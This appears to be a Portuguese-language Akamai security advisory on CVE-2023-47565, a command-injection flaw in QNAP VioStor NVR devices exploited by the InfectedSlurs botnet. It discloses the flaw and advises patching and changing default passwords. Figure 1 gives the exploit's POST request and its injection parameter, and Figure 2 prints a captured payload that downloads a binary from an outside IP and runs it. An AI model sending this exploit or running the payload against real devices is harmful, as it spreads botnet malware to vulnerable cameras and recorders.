Precisa de computação em nuvem? Comece agora mesmo

Vulnerabilidade explorada ativamente no QNAP VioStor NVR: corrigida, patches disponíveis

Akamai Wave Blue

escrito por

Chad Seaman e Larry Cashdollar

December 14, 2023

Chad Seaman headshot

escrito por

Chad Seaman

Chad Seaman é um pesquisador principal de segurança e líder da equipe de resposta de inteligência de segurança da Akamai. Ele orgulhosamente se refere a si mesmo como um “caçador de lixo na Internet” e gosta de vasculhar a lama que encontra lá. Chad começou sua carreira como programador e, depois de conhecer os temas de segurança, exploração e forense por meio de investigações de violação, a segurança rapidamente se tornou seu trabalho preferido. Ele agora passa seu tempo envolvido em investigações de malware, engenharia reversa, pesquisa de vulnerabilidade, DDoS e investigações de crimes cibernéticos. Gosta de pilotar aviões, furar papéis à distância e estar na natureza, de preferência no mato, fazendo trilha com sua moto.

Larry Cashdollar

escrito por

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Os sistemas legados são um terreno fértil para que novas vulnerabilidades sejam descobertas e exploradas para a propagação de malware.

Resumo executivo

É importante saber

Como parte de nossa pesquisa da InfectedSlurs, a SIRT descobriu uma vulnerabilidade nos dispositivos NVR (gravador de vídeo em rede) QNAP VioStor que está sendo explorada ativa e livremente. O dispositivo NVR é uma solução de vigilância de rede de alto desempenho para monitoramento baseado em rede de câmeras IP, gravação de vídeos, reprodução e acesso remoto a dados. A vulnerabilidade recebeu o ID CVE de CVE-2023-47565 com uma pontuação CVSS v3 de 8,0.

A vulnerabilidade permite que um invasor autenticado obtenha injeção de comando do sistema operacional com uma carga útil entregue por meio de uma solicitação de POST à interface de gerenciamento. Em sua configuração atual, ela está utilizando credenciais padrão do dispositivo nas cargas úteis capturadas.

As seguintes versões do firmware QNAP VioStor NVR foram afetadas:

  • NVR VioStor: Versões 5.0.0 e anteriores (5.0.0 lançada em 21 de junho de 2014)

A QNAP considera o suporte a esses dispositivos descontinuado; no entanto, o fornecedor recomenda atualizar o firmware VioStor nos dispositivos existentes para a versão mais recente disponível. Esse problema já havia sido corrigido anteriormente, embora nunca tenha sido relatado/divulgado publicamente. Além disso, os usuários devem alterar as senhas padrão em seus dispositivos.

Ademais, a US-CERT emitiu um comunicado.

Exploração observada

Inicialmente, quando analisamos as cargas úteis de exploração durante a campanha InfectedSlurs, relatamos apenas duas vulnerabilidades de dia zero, pois a equipe não foi capaz de vincular positivamente a exploração observada a um determinado dispositivo ou fabricante. Isso dificultou a confirmação da classificação de dia zero da exploração.

Após uma análise mais profunda de vários aspectos da exploração e da carga útil, a SIRT acreditava que o alvo eram os dispositivos QNAP VioStor NVR. Esses dispositivos se encaixam no perfil de alvo da campanha e foram enviados com credenciais padrão fracas (encontradas em seus manuais e observadas na exploração). Como no caso dos dois ataques de dia zero iniciais, os dispositivos infectados poderiam facilitar as vulnerabilidades de injeção de comando do sistema operacional nas configurações de NTP nos dispositivos de IoT (Internet das Coisas) e NVR afetados.

Depois de comunicar essas teorias à US-CERT, eles trabalharam em conjunto com a SIRT da Akamai e a QNAP para analisar as evidências e ajudar a confirmar as teorias da SIRT. Por fim, a QNAP confirmou que as cargas úteis visavam seus dispositivos VioStor, que foram descontinuados e não têm mais suporte, mas visavam apenas versões mais antigas (5.0.0 ou anterior) de seu firmware lançado anteriormente.

A vulnerabilidade é explorada ao fazer uma solictação POST para o caminho /cgi-bin/server/server.cgi. A RCE (execução remota de código) existe quando o argumento para SPECIFIC_SERVER é especificado (Figura 1).

  URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=

PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]

Fig. 1: Tentativa de exploração de RCE por meio de injeção de comando

Um exemplo de uma carga útil de infecção capturada é mostrado na figura 2.

  wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86

Fig. 2: Carga útil RCE capturada

As práticas básicas de segurança são importantes

O básico é importante. Essas observações enfatizam mais uma vez a importância das práticas recomendadas básicas de segurança, como a alteração de senhas padrão em dispositivos durante a configuração inicial. Eles também destacam a importância de implementar protocolos de segurança proativos e de longo prazo ainda mais fortes, como garantir a atualização consistente de sistemas para proteção contra possíveis ataques e, ocasionalmente, verificar sistemas/dispositivos, especialmente se eles estiverem exibindo um comportamento estranho.

Conclusão

Mais uma vez, nossa implantação de uma rede honeypot personalizada forneceu insights valiosos sobre ataques cibernéticos, revelando vulnerabilidades anteriormente desconhecidas. A presença de credenciais padrão e de sistemas em rede desatualizados e sem suporte surgiu como uma rota para infecções de botnets. Os sistemas legados são um terreno fértil para que novas vulnerabilidades sejam descobertas e exploradas para a propagação de malware.

Essa descoberta enfatiza a grande importância de promover a conscientização e a educação sobre as práticas recomendadas para a IoT, destacando os riscos associados para o consumidor comum. A necessidade de conscientização vai além dos consumidores e se aplica também aos fabricantes desses dispositivos. Ciclos de suporte para software mais longos e segurança na configuração, como alterações obrigatórias de senha, são essenciais para manter a segurança do sistema.

Fique atento

O Akamai Security Intelligence Group continuará a monitorar e reportar ameaças como essas para promover a conscientização de nossos clientes e da comunidade de segurança em geral. Para mais pesquisas, siga-nos no X, antigo Twitter, para ficar a par do que estamos observando por aí.

A SIRT da Akamai gostaria de agradecer à CISA, à US-CERT e à QNAP pela assistência com nossas comunicações, coordenação, identificação, remediação e esforços de divulgação.



Akamai Wave Blue

escrito por

Chad Seaman e Larry Cashdollar

December 14, 2023

Chad Seaman headshot

escrito por

Chad Seaman

Chad Seaman é um pesquisador principal de segurança e líder da equipe de resposta de inteligência de segurança da Akamai. Ele orgulhosamente se refere a si mesmo como um “caçador de lixo na Internet” e gosta de vasculhar a lama que encontra lá. Chad começou sua carreira como programador e, depois de conhecer os temas de segurança, exploração e forense por meio de investigações de violação, a segurança rapidamente se tornou seu trabalho preferido. Ele agora passa seu tempo envolvido em investigações de malware, engenharia reversa, pesquisa de vulnerabilidade, DDoS e investigações de crimes cibernéticos. Gosta de pilotar aviões, furar papéis à distância e estar na natureza, de preferência no mato, fazendo trilha com sua moto.

Larry Cashdollar

escrito por

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.